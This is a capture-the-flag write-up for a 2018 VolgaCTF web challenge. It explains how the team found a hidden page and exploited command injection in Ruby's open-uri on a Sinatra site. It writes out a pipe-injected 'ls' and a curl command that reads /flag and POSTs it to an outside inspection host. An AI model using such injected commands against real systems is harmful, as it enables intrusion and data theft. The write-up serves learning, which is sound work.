Team: NOPS
Category: Web
Points: 150
Description:
It's an old government web-site. Please, don't touch it. It works properly.
After connecting to the website, you have access to some links, no forms. Nevertheless we saw that pages are fetched with an id: http://old-government-site.quals.2018.volgactf.ru:8080/page?id=33
We run a script to see if there were some hidden pages and found one with the id: id=18
It asks us to enter a website.
If you enter a correct website like http://google.com you have a string showing validated whereas is you only put google.com, it shows error.
When you enter a correct website, the server does a GET request on it.
So we played a bit with this field and found out that /etc is a correct website. We then tried with the linux filesystem /var and some linux commands /bin/ls etc and finally, we tried /flag. It worked. Nice, maybe it's where the flag is, but how can we access it ?
Up to now, we know that the script behind is executing the command we give or send a GET request on the url.
We also know that the framework used for the website is Sinatra. if you request an unknow web page, it gives you an error. Sinatra is in ruby.
So we have to find a function in ruby that could open a file or a URL.
We found open-uri and the vulnerabilities related to it: sakurity.com
Let's try a | ls : it's validated. We've got a command injection. Let's craft our command so it can read the /flag file and send it to a server: |curl -d "$(cat /flag)" -X POST http://ptsv2.com/t/3awt7-1521988385/post (we use ptsv2 website to inspect the content of the HTTP requests)
Bingo ! We've got out flag !